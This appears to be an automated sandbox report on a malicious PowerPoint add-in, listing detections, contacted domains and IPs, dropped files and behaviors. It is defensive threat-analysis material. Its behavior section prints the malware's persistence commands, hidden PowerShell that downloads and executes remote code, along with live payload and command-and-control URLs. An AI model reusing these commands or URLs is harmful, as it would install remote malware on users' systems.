          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion141Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553159 Sample: 3.ppam Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 82 Found malware configuration 2->82 84 Antivirus detection for URL or domain 2->84 86 Multi AV Scanner detection for submitted file 2->86 88 9 other signatures 2->88 8 cmd.exe 5 2 2->8         started        10 powershell.exe 14 26 2->10         started        13 powershell.exe 2->13         started        15 2 other processes 2->15 process3 dnsIp4 17 POWERPNT.EXE 159 32 8->17         started        20 conhost.exe 8->20         started        60 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com 10->60 62 blogspot.l.googleusercontent.com 142.250.186.129, 443, 49824, 49825 GOOGLEUS United States 10->62 68 3 other IPs or domains 10->68 22 conhost.exe 10->22         started        64 104.16.203.237, 443, 49827 CLOUDFLARENETUS United States 13->64 66 www.mediafire.com 13->66 70 2 other IPs or domains 13->70 24 conhost.exe 13->24         started        26 schtasks.exe 13->26         started        72 3 other IPs or domains 15->72 28 conhost.exe 15->28         started        30 schtasks.exe 15->30         started        process5 file6 46 C:\Users\user\Pictures\notnice.ps1, ASCII 17->46 dropped 48 C:\Users\user\Desktop\~$3.ppam, data 17->48 dropped 50 C:\Users\user\AppData\Roaming\...\3.ppam.LNK, MS 17->50 dropped 32 powershell.exe 16 22 17->32         started        process7 dnsIp8 52 www.j.mp 32->52 54 download2262.mediafire.com 199.91.155.3, 443, 49784, 49829 MEDIAFIREUS United States 32->54 56 4 other IPs or domains 32->56 74 Creates autostart registry keys with suspicious values (likely registry only malware) 32->74 76 Creates an autostart registry key pointing to binary in C:\Windows 32->76 78 Uses schtasks.exe or at.exe to add and modify task schedules 32->78 80 2 other signatures 32->80 36 aspnet_compiler.exe 32->36         started        39 aspnet_compiler.exe 32->39         started        42 conhost.exe 32->42         started        44 2 other processes 32->44 signatures9 process10 dnsIp11 90 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->90 92 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->92 94 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 36->94 58 207.32.217.137, 49838, 49839, 8081 1GSERVERSUS United States 39->58 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          3.ppam26%ReversingLabsDocument-Office.Downloader.Powdow

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          31.0.aspnet_compiler.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen2Download File
          31.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen2Download File
          31.0.aspnet_compiler.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen2Download File
          31.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen2Download File
          31.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen2Download File
          31.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen2Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          https://roaming.edog.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          http://www.j.mp/asasdjiasjdiasjasdasddik0%Avira URL Cloudsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%URL Reputationsafe
          https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt100%Avira URL Cloudmalware
          http://kVEmyA.com0%Avira URL Cloudsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://api.aadrm.com0%URL Reputationsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          http://207.32.217.137:8081x&bq(0%Avira URL Cloudsafe
          https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
          http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POST0%Avira URL Cloudsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mediafire.com
          		104.16.202.237
          		truefalse
            		high
            bit.ly
            		67.199.248.11
            		truefalse
              		high
              blogspot.l.googleusercontent.com
              		142.250.186.129
              		truefalse
                		high
                j.mp
                		67.199.248.17
                		truefalse
                  		unknown
                  gcp.media-router.wixstatic.com
                  		34.102.176.152
                  		truefalse
                    		high
                    download2262.mediafire.com
                    		199.91.155.3
                    		truefalse
                      		high
                      p26ynn.blogspot.com
                      		unknown
                      		unknownfalse
                        		high
                        p6tbbb.blogspot.com
                        		unknown
                        		unknownfalse
                          		high
                          www.j.mp
                          		unknown
                          		unknowntrue
                            		unknown
                            5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.j.mp/asasdjiasjdiasjasdasddikfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.mediafire.com/file/nm9ysba5ejf20r8/6.dll/filefalse
                                		high
                                https://p26ynn.blogspot.com/atom.xmlfalse
                                  		high
                                  https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txtfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://bit.ly/asasdjiasjdiasjasdasddikfalse
                                    		high
                                    https://www.mediafire.com/file/5avuvurhf9r42y3/6.dll/filefalse
                                      		high
                                      https://p6tbbb.blogspot.com/atom.xmlfalse
                                        		high
                                        https://download2262.mediafire.com/1rxjqgtrygkg/5avuvurhf9r42y3/6.dllfalse
                                          		high
                                          https://download2262.mediafire.com/u45xa78x9nkg/5avuvurhf9r42y3/6.dllfalse
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://api.diagnosticssdf.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                              		high
                                              http://127.0.0.1:HTTP/1.1aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://login.microsoftonline.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                		high
                                                https://shell.suite.office.com:14438C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                  		high
                                                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                    		high
                                                    https://autodiscover-s.outlook.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                      		high
                                                      https://roaming.edog.8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                        		high
                                                        https://cdn.entity.8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.addins.omex.office.net/appinfo/query8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                          		high
                                                          https://clients.config.office.net/user/v1.0/tenantassociationkey8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                            		high
                                                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                              		high
                                                              https://powerlift.acompli.net8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://rpsticket.partnerservices.getmicrosoftkey.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://lookup.onenote.com/lookup/geolocation/v18C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                		high
                                                                https://cortana.ai8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                  		high
                                                                  https://cloudfiles.onenote.com/upload.aspx8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                    		high
                                                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                      		high
                                                                      https://entitlement.diagnosticssdf.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                        		high
                                                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                          		high
                                                                          https://api.aadrm.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://ofcrecsvcapi-int.azurewebsites.net/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                            		high
                                                                            https://api.microsoftstream.com/api/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                              		high
                                                                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                		high
                                                                                https://cr.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                  		high
                                                                                  https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  https://portal.office.com/account/?ref=ClientMeControl8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                    		high
                                                                                    https://graph.ppe.windows.net8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                      		high
                                                                                      https://res.getmicrosoftkey.com/api/redemptionevents8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://powerlift-frontdesk.acompli.net8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://tasks.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                        		high
                                                                                        https://officeci.azurewebsites.net/api/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/work8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                          		high
                                                                                          http://kVEmyA.comaspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://store.office.cn/addinstemplate8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://api.aadrm.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haaspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://go.micropowershell.exe, 00000009.00000003.392280394.0000000005423000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                            		high
                                                                                            https://globaldisco.crm.dynamics.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                              		high
                                                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                		high
                                                                                                https://dev0-api.acompli.net/autodetect8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://www.odwebp.svc.ms8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://api.powerbi.com/v1.0/myorg/groups8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                  		high
                                                                                                  https://web.microsoftstream.com/video/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                    		high
                                                                                                    https://api.addins.store.officeppe.com/addinstemplate8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://graph.windows.net8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                      		high
                                                                                                      https://dataservice.o365filtering.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://officesetup.getmicrosoftkey.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://analysis.windows.net/powerbi/api8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                        		high
                                                                                                        https://prod-global-autodetect.acompli.net/autodetect8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://outlook.office365.com/autodiscover/autodiscover.json8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                          		high
                                                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                            		high
                                                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                              		high
                                                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                		high
                                                                                                                https://ncus.contentsync.8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                  		high
                                                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                    		high
                                                                                                                    http://weather.service.msn.com/data.aspx8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                      		high
                                                                                                                      https://apis.live.net/v5.0/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                        		high
                                                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                          		high
                                                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                            		high
                                                                                                                            https://management.azure.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                              		high
                                                                                                                              https://outlook.office365.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                		high
                                                                                                                                https://wus2.contentsync.8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://207.32.217.137:8081x&bq(aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		low
                                                                                                                                https://incidents.diagnostics.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://clients.config.office.net/user/v1.0/ios8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://insertmedia.bing.office.net/odc/insertmedia8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://o365auditrealtimeingestion.manage.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://outlook.office365.com/api/v1.0/me/Activities8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.net8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policies8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://entitlement.diagnostics.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POSTaspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v2/init8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://storage.live.com/clientlogs/uploadlocation8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://outlook.office365.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://webshell.suite.office.com8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://substrate.office.com/search/api/v1/SearchHistory8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://management.azure.com/8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://login.windows.net/common/oauth2/authorize8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown

                                                                                                                                                                      Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      104.16.202.237
                                                                                                                                                                      		www.mediafire.comUnited States
                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                      142.250.186.129
                                                                                                                                                                      		blogspot.l.googleusercontent.comUnited States
                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                      67.199.248.17
                                                                                                                                                                      		j.mpUnited States
                                                                                                                                                                      		396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                                                                                                                      104.16.203.237
                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                      34.102.176.152
                                                                                                                                                                      		gcp.media-router.wixstatic.comUnited States
                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                      207.32.217.137
                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                      		143151GSERVERSUStrue
                                                                                                                                                                      199.91.155.3
                                                                                                                                                                      		download2262.mediafire.comUnited States
                                                                                                                                                                      		46179MEDIAFIREUSfalse
                                                                                                                                                                      67.199.248.11
                                                                                                                                                                      		bit.lyUnited States
                                                                                                                                                                      		396982GOOGLE-PRIVATE-CLOUDUSfalse

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                      Analysis ID:553159
                                                                                                                                                                      Start date:14.01.2022
                                                                                                                                                                      Start time:12:18:26
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 8m 55s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:3.ppam
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                                      Number of analysed new started processes analysed:39
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winPPAM@27/30@17/9
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:Failed
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 93
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .ppam
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Found warning dialog
                                                                                                                                                                      • Click Ok
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.8.25, 52.109.12.23, 52.109.12.21, 52.109.76.34, 52.109.88.38
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                      • VT rate limit hit for: 3.ppam

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      12:20:05API Interceptor587x Sleep call for process: powershell.exe modified
                                                                                                                                                                      12:20:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      12:20:39Task SchedulerRun new task: akohijijkuhdi path: powershell s>-w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      12:20:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      12:21:24API Interceptor122x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      104.16.202.237http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/download_repair.php?flag=3&dkey=5rqvtr7atab&qkey=4ufxk777x7qfcdd&ip=84.17.52.74&ref=3
                                                                                                                                                                      http://download2134.mediafire.com/6d7pu7669u7g/5vpr2kr4s29utk7/PAG004.tgzGet hashmaliciousBrowse
